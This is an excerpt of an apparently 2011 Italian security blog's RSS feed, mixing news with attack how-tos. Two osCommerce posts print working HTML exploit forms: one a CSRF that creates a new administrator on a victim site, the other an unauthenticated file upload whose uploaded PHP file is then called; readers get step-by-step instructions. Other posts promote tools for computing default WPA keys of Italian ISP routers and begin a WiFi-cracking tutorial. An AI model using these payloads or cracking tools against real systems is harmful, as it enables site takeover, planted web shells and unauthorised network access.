			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/11/wifi-courtesy_cvas.jpg" rel="lightbox[3887]" title="wifi-courtesy_cvas"><img class="alignleft size-thumbnail wp-image-3888" title="wifi-courtesy_cvas" src="http://www.capn3m0.org/wp-content/uploads/2011/11/wifi-courtesy_cvas-150x150.jpg" alt="Wpa Tester 1.7, ora anche TeleTu oltre ad Alice e Fastweb" width="150" height="150" /></a>Pochi giorni fa avevamo pubblicato <a href="http://www.capn3m0.org/alice-fastweb-wpa-tester-1.6-sett-2011.html"><strong>questo articolo</strong></a> dove veniva recensita la versione 1.6 del noto software <strong></strong><strong>Wpa Tester</strong> creato da Francesco Pompili per l&#8217;analisi, il calcolo e il <strong>crack delle reti Wifi di Telecom Alice e Fastweb</strong>.</p>
<p>Questa versione rispetto alle precedenti grazie all&#8217;aggiornamento del file &#8220;config.txt&#8221; permetteva di analizzare un numero maggiori di reti che fino a qualche tempo fa non permettevano di calcolare la chiave Wpa.</p>
<p>La nuova versione di cui andiamo a parlare oggi, rilasciata da qualche ora, è la versione <strong>1.7 del <em>Wpa Tester</em></strong> e integra il supporto al calcolo delle reti del <strong>Provider TeleTu</strong> finora rimasto in secondo piano.</p>
<p>Per quanto riguarda il <strong>cracking delle reti Alice e Fastweb</strong> non è stato aggiornato nulla pertanto l&#8217;unica vera differenza rispetto alla precedente versione è appunto il supporto a TeleTu.</p>
<p>Ancora una volta ringraziamo <a href="http://www.francesco-pompili.it/" target="_blank">Francesco Pompili</a> per il suo lavoro nello sviluppo di <strong><span style="text-decoration: underline;">Wpa Tester</span></strong>.</p>
<p><a title="Wpa Tester 1.7" href="http://adf.ly/3xXe1" target="_blank"><strong>Wpa Tester 1.7 DOWNLOAD</strong></a></p>
<p><strong><span style="color: #ff0000;">AGGIORNAMENTO 27/11/2011</span></strong> &#8211; Le Wpa delle reti wireless Fastweb possono essere calcolate direttamente on line tramite il<a href="http://www.capn3m0.org/fastweb-wpa-calculator-online"><strong> tool Fastweb Wpa Calculator OnLine</strong></a>.</p>
<p><strong><span style="color: #ff0000;">AGGIORNAMENTO 29/11/2011</span></strong> &#8211; Le Wpa delle reti wireless Alice possono essere calcolate direttamente on line tramite il<strong> <a href="http://www.capn3m0.org/alice-wpa-calculator-online">tool Alice Wpa Calculator OnLine</a></strong>.</p>
<p><strong>N.B. </strong></p>
<p><strong>Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).</strong></p>
<p><strong> Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.</strong></p>
<p><strong>L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/wpa-tester-1.7-ora-anche-teletu-oltre-ad-alice-e-fastweb.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; osCommerce v3.0a5 Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 19:14:17 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 3]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[xsrf]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2725</guid>
		<description><![CDATA[Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release osCommerce 3.0.a5. Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo.jpg" rel="lightbox[2725]" title="osCommerceLogo"><img class="alignleft size-thumbnail wp-image-2726" title="osCommerceLogo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo-150x137.jpg" alt="[EXPLOIT]   osCommerce v3.0a5 Multiple Vulnerabilities" width="150" height="137" /></a>Seguendo la scia di notizie degli ultimi tempi che han portato alla luce <strong>gravi vulnerabilità</strong> per le ultime versioni di <strong><a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html">OsCommerce (2.3.1)</a> e<a href="http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html"> ZenCart (1.3.9h)</a></strong> non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release <strong>osCommerce 3.0.a5</strong>.</p>
<p>Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente &#8220;stabili&#8221; sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo <strong>Xss, Full Path Disclosure, Local File Inclusion e XSRF</strong>.</p>
<p>La<strong> Full Path Disclosure</strong> consiste nell&#8217;interrogare alcuni file del Template di OsCommerce che, andando in errore,<strong> mostrano a video la full path</strong> della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La <strong>XSS permette di iniettare codice JavaScript </strong>sfruttando una falla del file &#8220;products.php&#8221; mentre la <strong>Local File Inclusion</strong> consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.</p>
<p>Anche in questo caso c&#8217;è una <strong>falla più grave </strong>delle altre e a mio avviso è la <strong>XSRF</strong> che permette di inviare comandi all&#8217;applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico <strong>sarà possibile creare un nuovo Admin sull&#8217;OsCommerce</strong>.</p>
<p>Basterà creare una pagina &#8220;.html&#8221; contenente il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;html&gt;
&lt;body&gt;
&lt;form action=&quot;http://&lt;sito vittima&gt;/admin/index.php?administrators&amp;action=save&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_name&quot; value=&quot;&lt;nomeutente&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_password&quot; value=&quot;&lt;password&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;modules[]&quot; value=&quot;0?&gt;
&lt;input type=&quot;hidden&quot; name=&quot;subaction&quot; value=&quot;confirm&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></div></div>

<p>Ovviamente dovrete sostituire i seguenti parametri:</p>
<p><strong>&lt;sito vittima</strong>&gt; con il dominio del sito in cui si vuole creare l&#8217;account</p>
<p><strong>&lt;nomeutente&gt;</strong> con il nome utente del nuovo Admin</p>
<p><strong>&lt;password&gt;</strong> con la password da associare al nuovo Admin</p>
<p>Una volta creata la pagina richiamatela dal vostro Browser e cliccate su &#8220;Save&#8221;.</p>
<p>Se tutto è andato a buon fine accedendo all&#8217;url:</p>
<p><cite>http://&lt;sito vittima&gt;/admin/</cite></p>
<p><strong>potrete loggarvi come Admin</strong> con i dati appena inseriti.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell’articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/oscommerce-v3-0a5-multiple-vulnerabilities/" target="_blank">osCommerce v3.0a5 [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; ZenCart 1.3.9h Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 17:37:19 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack zencart]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[zencart]]></category>
		<category><![CDATA[zencart 1.3.9h]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2723</guid>
		<description><![CDATA[E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una nuova falla per OsCommerce a catena vengano individuate le stesse (o quasi) falle per ZenCart, altro noto Cms derivato dallo stesso OsCommerce. La versione vulnerabile è l&#8217;ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo.jpg" rel="lightbox[2723]" title="zencart_logo"><img class="alignleft size-thumbnail wp-image-2724" title="zencart_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo-150x88.jpg" alt="[EXPLOIT]   ZenCart 1.3.9h Multiple Vulnerabilities" width="150" height="88" /></a>E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una <a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html"><strong>nuova falla</strong></a> per OsCommerce a catena vengano individuate le stesse (o quasi) falle per<a href="http://www.zen-cart.com/" target="_blank"> <strong>ZenCart</strong></a>, altro noto Cms derivato dallo stesso OsCommerce.</p>
<p>La versione vulnerabile è l&#8217;ultima disponibile ossia la <strong>1.3.9h</strong> e presenta vulnerabilità di vario tipo: <strong>Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload</strong>.</p>
<p>La vulnerabilità <strong>Full Path Disclosure</strong> permette, se la gestione degli errori è configurata per mostrarli a video, di<strong> conoscere la path assoluta</strong> dell&#8217;applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l&#8217;informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due <strong>XSS</strong>, invece, non affliggono l&#8217;attuale 1.3.9h ma <strong>tutte le versioni precedenti</strong>. Le vulnerabilità sono localizzate nel campo &#8220;Quantità&#8221; del carrello che permette l<strong>&#8216;injection di codice XSS</strong> e nell&#8217;Area Amministrativa &#8220;Location/Taxes&#8221;. Per quest&#8217;ultima, quindi, si presume che si abbia già l&#8217;accesso Admin.</p>
<p>L&#8217;ultima vulnerabilità, la più grave, riguarda invece il <strong>componente Banner (banner_manager.php)</strong> che, così come per OsCommerce, permette di <strong>effettuare l&#8217;upload di files</strong> che verranno salvati nella cartella &#8220;images&#8221;.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell&#8217;articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/zen-cart-v-1-3-9h-multiple-vulnerabilities/" target="_blank">Zen Cart &lt;= v.1.3.9h [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; OsCommerce 2.3.1 Remote File Upload Vulnerability</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html#comments</comments>
		<pubDate>Thu, 19 May 2011 18:31:22 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 2.3.1]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2630</guid>
		<description><![CDATA[Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce OsCommerce su questo sito era per segnalare una grave vulnerabilità presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso. A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo.gif" rel="lightbox[2630]" title="oscommerce_logo"><img class="alignleft size-thumbnail wp-image-2631" title="oscommerce_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo-150x114.gif" alt="[EXPLOIT]   OsCommerce 2.3.1 Remote File Upload Vulnerability" width="150" height="114" /></a>Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce <a href="http://oscommerce.com/" target="_blank"><strong>OsCommerce</strong></a> su questo sito era per <a href="http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html">segnalare</a> una <strong>grave vulnerabilità</strong> presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso.</p>
<p>A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato <strong>2 nuove versioni</strong>: la <strong>2.3.1</strong> e la nuova <strong>3.0.1</strong>. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.</p>
<p>Lo scorso 14 Maggio, però, è stata scoperta una <strong>nuova falla</strong> (purtoppo molto simile alla precedente) che permette l&#8217;upload di files nella cartella &#8220;/images&#8221; senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.</p>
<p><span id="more-2630"></span>Come riportato <a href="http://www.bugsearch.net/it/11838/oscommerce-231-bannermanagerphp-remote-file-upload-vulnerability.html" target="_blank"><strong>qui</strong></a> il componente Banner (<strong>banner_manager.php</strong>) della nuova versione 2.3.1 di OsCommerce soffre di una vulnerabilità che <strong>consente di uploadare files</strong> sul sito &#8220;vittima&#8221; semplicemente creando sul proprio PC una pagina html con il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;form name=”new_banner” action=”http://site/path/admin/banner_manager.php/login.php?action=insert” method=”post” enctype=”multipart/form-data”&gt;&lt;br&gt;
&lt;input type=”file” name=”banners_image”&gt;&lt;br&gt;
&lt;input name=”submit” value=” Save ” type=”submit”&gt;&lt;/form&gt;</pre></div></div>

<p>Basterà sostituire a &#8220;<strong>site/path</strong>&#8221; il dominio e l&#8217;eventuale sottocartella del sito basato su questo Cms e salvare il file in formato &#8220;.html&#8221;.</p>
<p>Apritelo con il vostro Browser e vi troverete davanti un form di upload file.</p>
<p>Scegliete il vostro file e fate l&#8217;upload; una volta terminata l&#8217;operazione potrete interrogare il file richiamando l&#8217;url nel seguente modo:</p>
<p>http://<strong>site/path</strong>/images/&lt;fileinviato.php&gt;</p>
<p>Analizzando alcuni casi di utilizzo di questa vulnerabilità ho riscontrato casi di <strong>iniezione di virus/malware</strong> come <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html">già riscontrato</a> sempre nel 2009.</p>
<p>Non appena avrò maggiori informazioni provvederò a tenervi aggiornati.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google risolve grave problema di sicurezza su Android</title>
		<link>http://www.capn3m0.org/google-risolve-grave-problema-di-sicurezza-su-android.html</link>
		<comments>http://www.capn3m0.org/google-risolve-grave-problema-di-sicurezza-su-android.html#comments</comments>
		<pubDate>Wed, 18 May 2011 21:02:52 +0000</pubDate>
		<dc:creator>Federico Raffaelli</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[android fix]]></category>
		<category><![CDATA[android security issue]]></category>
		<category><![CDATA[gingerbread 2.3.4]]></category>
		<category><![CDATA[google patch]]></category>
		<category><![CDATA[google-android]]></category>
		<category><![CDATA[Honeycomb 3.0]]></category>
		<category><![CDATA[wifi hack]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2623</guid>
		<description><![CDATA[Non sono passate nemmeno 24 ore da quando é stata scoperta una gravissima vulnerabilità di Android che Google é corsa ai ripari sviluppando un fix che verrà rilasciato via ota già dalle prossime ore. La vulnerabilità è particolarmente grave perchè colpisce piú del 99% dei device attivi, ne risultano immuni infatti solo le versioni Gingerbread [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/20110518-111359.jpg" rel="lightbox[2623]" title="android"><img class="alignleft size-thumbnail wp-image-2626" title="android" src="http://www.capn3m0.org/wp-content/uploads/2011/05/20110518-111359-150x150.jpg" alt="Google risolve grave problema di sicurezza su Android" width="150" height="150" /></a>Non sono passate nemmeno 24 ore da quando é stata scoperta una <strong>gravissima vulnerabilità</strong> di <strong>Android</strong> che <strong>Google</strong> é corsa ai ripari sviluppando un fix che verrà rilasciato via ota già dalle prossime ore.</p>
<p>La vulnerabilità è particolarmente grave perchè <strong>colpisce piú del 99% dei device</strong> attivi, ne risultano immuni infatti solo le versioni <strong>Gingerbread 2.3.4</strong> e <strong>Honeycomb 3.0 e 3.1</strong>.<br />
Per fortuna, in attesa di ricevere il fix nei prossimi giorni gli utenti potranno comunque proteggersi mettendo in pratica alcuni accorgimenti.<br />
Il <strong>problema di sicurezza</strong> si verifica solo se un utente si collega ad una <strong>rete wifi libera</strong>, quindi chiunque si connetta abitualmente ad <strong>hotspot</strong> o lo abbia fatto di recente farebbe meglio a disattivare l&#8217;opzione di connessione automatica alle reti wifi ed eliminando il consenso a quelle utilizzate di recente, nel caso la rete free fosse di proprietà il consiglio é ovviamente quello di impostare una protezione, ma questo é una buona norma sempre, non solo in casi di vulnerabilità come quella di cui stiamo parlando in questo articolo.<br />
Allo stato attuale, in attesa della <strong>patch di Google</strong>, il rischio che si corre é quello che un utente non autorizzato possa accedere ai nostri dati contenuti nel <strong>calendario</strong> e nei <strong>contatti</strong> di Android perché lo scambio di autorizzazione tra il client e server non avviene tramite protocollo <strong>https</strong> (Hyper Text Transfer Protocol Secure), ma tramite semplice http.<br />
Tuttavia Google sta valutando anche la connessione alle librerie di <strong>Picasa</strong> che sembrerebbero anch&#8217;esse affette dalla stessa vulnerabilità, un motivo in piú per diffidare delle reti aperte fino a che non sarà cessato del tutto questo giustificato allarme.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/google-risolve-grave-problema-di-sicurezza-su-android.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blackberry Playbook: scoperto il primo hack per aggirare il kit di sviluppo</title>
		<link>http://www.capn3m0.org/blackberry-playbook-scoperto-il-primo-hack-per-aggirare-il-kit-di-sviluppo.html</link>
		<comments>http://www.capn3m0.org/blackberry-playbook-scoperto-il-primo-hack-per-aggirare-il-kit-di-sviluppo.html#comments</comments>
		<pubDate>Fri, 06 May 2011 08:54:01 +0000</pubDate>
		<dc:creator>Federico Raffaelli</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Blackberry]]></category>
		<category><![CDATA[blackberry playbook]]></category>
		<category><![CDATA[playbook hack]]></category>
		<category><![CDATA[QNX]]></category>
		<category><![CDATA[rim]]></category>
		<category><![CDATA[sdk]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2583</guid>
		<description><![CDATA[Rim ha dimostrato recentemente durante il suo annuale Blackberry World il kit di sviluppo per scrivere e convertire applicazioni per Playbook. Come saprete il tablet di Research In Motion è basato sul rivoluzionario e solido sistema operativo QNX, grazie al quale gode forse del miglior multitasking e prestazioni in commercio. Visto che tale SDK non [...]]]></description>
			<content:encoded><![CDATA[<p><strong><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/091001-BlackBerry-PlayBook.jpg" rel="lightbox[2583]" title="Blackberry Playbook OS"><img class="alignleft size-thumbnail wp-image-2584" title="Blackberry Playbook OS" src="http://www.capn3m0.org/wp-content/uploads/2011/05/091001-BlackBerry-PlayBook-150x150.jpg" alt="Blackberry Playbook: scoperto il primo hack per aggirare il kit di sviluppo" width="150" height="150" /></a>Rim</strong> ha dimostrato recentemente durante il suo annuale Blackberry World il kit di sviluppo per scrivere e convertire applicazioni per <a href="http://www.capn3m0.org/blackberry-playbook.html" target="_blank"><strong>Playbook</strong></a>.</p>
<p>Come saprete il tablet di Research In Motion è basato sul rivoluzionario e<strong> solido sistema operativo QNX</strong>, grazie al quale gode forse del miglior multitasking e prestazioni in commercio.</p>
<p>Visto che tale SDK non è ancora stato rilasciato sembrava impossibile poter sviluppare software senza un tale strumento di programmazione, ma uno sviluppatore di nome<strong> Adam Bell</strong> ha dimostrato come bypassare l&#8217;ambiente Adobe Air su cui è basata l&#8217;interfaccia grafica del tablet.<span id="more-2583"></span></p>
<p>Adam sostiene che, non senza alcuni tweak, è possibile installare su Playbook direttamente le app sviluppate  per QNX  tramite il suo ambiente di programmazione (questo disponibile invece da tempo) chiamato<strong> Neutrino SDP</strong> e avviarle nativamente sul tablet Rim.</p>
<p>Tutto ciò è possibile perchè l&#8217;ambiente di sviluppo desktop  di QNX contiene un cross-compiler, cioè un compilatore in grado di creare eseguibili per varie piattaforme , da quella i386 a quella ARM.Proprio quest&#8217;ultima è alla base dei moderni smartphone e tablet; Tegra2 e tutti i moderni chip dualcore in uscita nel 2011 sono infatti basati su una architettura ARM Cortex A9 o derivata, come la stessa CPU di Texas Instruments che muove il Blackberry Playbook.</p>
<p>Le applicazioni possono essere quindi scritte in C/C++ , compilate ed inviate al tablet Rim per essere eseguite.</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/qnx_desktop_playbook-580x362.png" rel="lightbox[2583]" title="Blackberry Playbook: scoperto il primo hack per aggirare il kit di sviluppo"><img class="aligncenter size-medium wp-image-2585" src="http://www.capn3m0.org/wp-content/uploads/2011/05/qnx_desktop_playbook-580x362-300x187.png" alt="Blackberry Playbook: scoperto il primo hack per aggirare il kit di sviluppo" width="300" height="187" title="Blackberry Playbook: scoperto il primo hack per aggirare il kit di sviluppo pics" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/blackberry-playbook-scoperto-il-primo-hack-per-aggirare-il-kit-di-sviluppo.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wpa Infostrada Crack, verso il reverse dell&#8217;algoritmo</title>
		<link>http://www.capn3m0.org/wpa-infostrada-crack-verso-il-reverse-dellalgoritmo.html</link>
		<comments>http://www.capn3m0.org/wpa-infostrada-crack-verso-il-reverse-dellalgoritmo.html#comments</comments>
		<pubDate>Sat, 16 Apr 2011 13:23:53 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[algoritmo reverse infostrada]]></category>
		<category><![CDATA[craccare infostrada wireless]]></category>
		<category><![CDATA[craccare wpa infostrada wifi]]></category>
		<category><![CDATA[hack infostradawifi]]></category>
		<category><![CDATA[infostrada crack wpa]]></category>
		<category><![CDATA[infostrada wpa crack]]></category>
		<category><![CDATA[pandarossa]]></category>
		<category><![CDATA[pandarossa infostrada download]]></category>
		<category><![CDATA[wifi crack]]></category>
		<category><![CDATA[wifi infostrada crack]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2265</guid>
		<description><![CDATA[Dopo il reverse dell&#8217;algoritmo dei Router Alice e Fastweb adesso tocca ad Infostrada WiFi. L&#8217;utente Pandarossa ha dedicato un apposito sito allo studio delle relazioni tra Mac address e SSID dei router Hauwei forniti in dotazione con la connessione Infostrada. Non si è ancora giunti ad un calcolo dell&#8217;algoritmo ma grazie allo studio di Pandarossa [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/04/wind-infostrada.jpg" rel="lightbox[2265]" title="wind-infostrada"><img class="alignleft size-thumbnail wp-image-2266" title="wind-infostrada" src="http://www.capn3m0.org/wp-content/uploads/2011/04/wind-infostrada-150x150.jpg" alt="Wpa Infostrada Crack, verso il reverse dellalgoritmo" width="150" height="150" /></a>Dopo il reverse dell&#8217;algoritmo dei Router Alice e Fastweb adesso tocca ad <strong>Infostrada WiFi</strong>. L&#8217;utente Pandarossa ha dedicato un apposito sito allo studio delle relazioni tra Mac address e SSID dei <strong>router Hauwei</strong> forniti in dotazione con la connessione Infostrada.</p>
<p>Non si è ancora giunti ad un calcolo dell&#8217;algoritmo ma grazie allo studio di Pandarossa si potrà arrivare a qualcosa.</p>
<p>Al fine di aiutarlo in questa fase è necessario fornirgli informazioni per avere una base di dati vasta per arrivare al reverse completo dell&#8217;algoritmo quindi se avete info di un router <strong>Hauwei Infostrada WiFi</strong> potete contattarlo e comunicarglieli.</p>
<p>Condividete! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="Wpa Infostrada Crack, verso il reverse dellalgoritmo" class='wp-smiley' title="Wpa Infostrada Crack, verso il reverse dellalgoritmo pics" /> </p>
<p><a href="http://wpa-infostrada.blogspot.com/" target="_blank"><strong>Wpa Infostrada &#8211; Pandarossa</strong></a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/wpa-infostrada-crack-verso-il-reverse-dellalgoritmo.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[HOWTO] &#8211; WiFi Crack Aircrack-ng suite</title>
		<link>http://www.capn3m0.org/wireless-crack-aircrack-suite.html</link>
		<comments>http://www.capn3m0.org/wireless-crack-aircrack-suite.html#comments</comments>
		<pubDate>Fri, 15 Apr 2011 19:15:52 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[alice wpa crack]]></category>
		<category><![CDATA[crack reti wpa2 windows]]></category>
		<category><![CDATA[fastweb wpa crack]]></category>
		<category><![CDATA[i wpa]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wep crack]]></category>
		<category><![CDATA[wifi crack]]></category>
		<category><![CDATA[wifi crack tutorial]]></category>
		<category><![CDATA[wpa]]></category>
		<category><![CDATA[wpa crack]]></category>
		<category><![CDATA[wpa2]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2261</guid>
		<description><![CDATA[Recentemente abbiamo pubblicato alcuni articoli relativi a dei semplici tool che permettevano di calcolare le chiavi Wpa dei Router WiFi Alice e Fastweb. Come si è visto dai commenti ricevuti, alcuni utenti sono rimasti delusi dal fatto che non tutte le reti Alice fossero calcolabili o perché le password generate non sempre erano funzionanti. Prendendo [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: small;"><a href="http://www.capn3m0.org/wp-content/uploads/2011/04/aircrack-ng-new-logo.jpg" rel="lightbox[2261]" title="aircrack-ng"><img class="alignleft size-thumbnail wp-image-2262" title="aircrack-ng" src="http://www.capn3m0.org/wp-content/uploads/2011/04/aircrack-ng-new-logo-150x110.jpg" alt="[HOWTO]   WiFi Crack Aircrack ng suite" width="150" height="110" /></a>Recentemente abbiamo pubblicato alcuni articoli relativi a dei semplici tool che permettevano di <strong>calcolare le chiavi Wpa dei Router WiFi <a href="http://www.capn3m0.org/wpa-tester-by-fr3nsis-1.5.html">Alice</a> e <a href="http://www.capn3m0.org/wifi-crack-alice-fastweb-wpa.html">Fastweb</a></strong>. Come si è visto dai commenti ricevuti, alcuni utenti sono rimasti delusi dal fatto che non tutte le reti Alice fossero calcolabili o perché le password generate non sempre erano funzionanti.</span></p>
<p><span style="font-size: small;">Prendendo spunto da queste osservazioni, ho deciso di pubblicare questo tutorial (è solo il primo di una serie) in cui descrivo lo strumento che permette di effettuare il “lavoro sporco”, ossia il <strong>penetration test</strong> delle reti WiFi: <strong><a href="http://www.capn3m0.org">aircrack</a>-ng</strong>.</span></p>
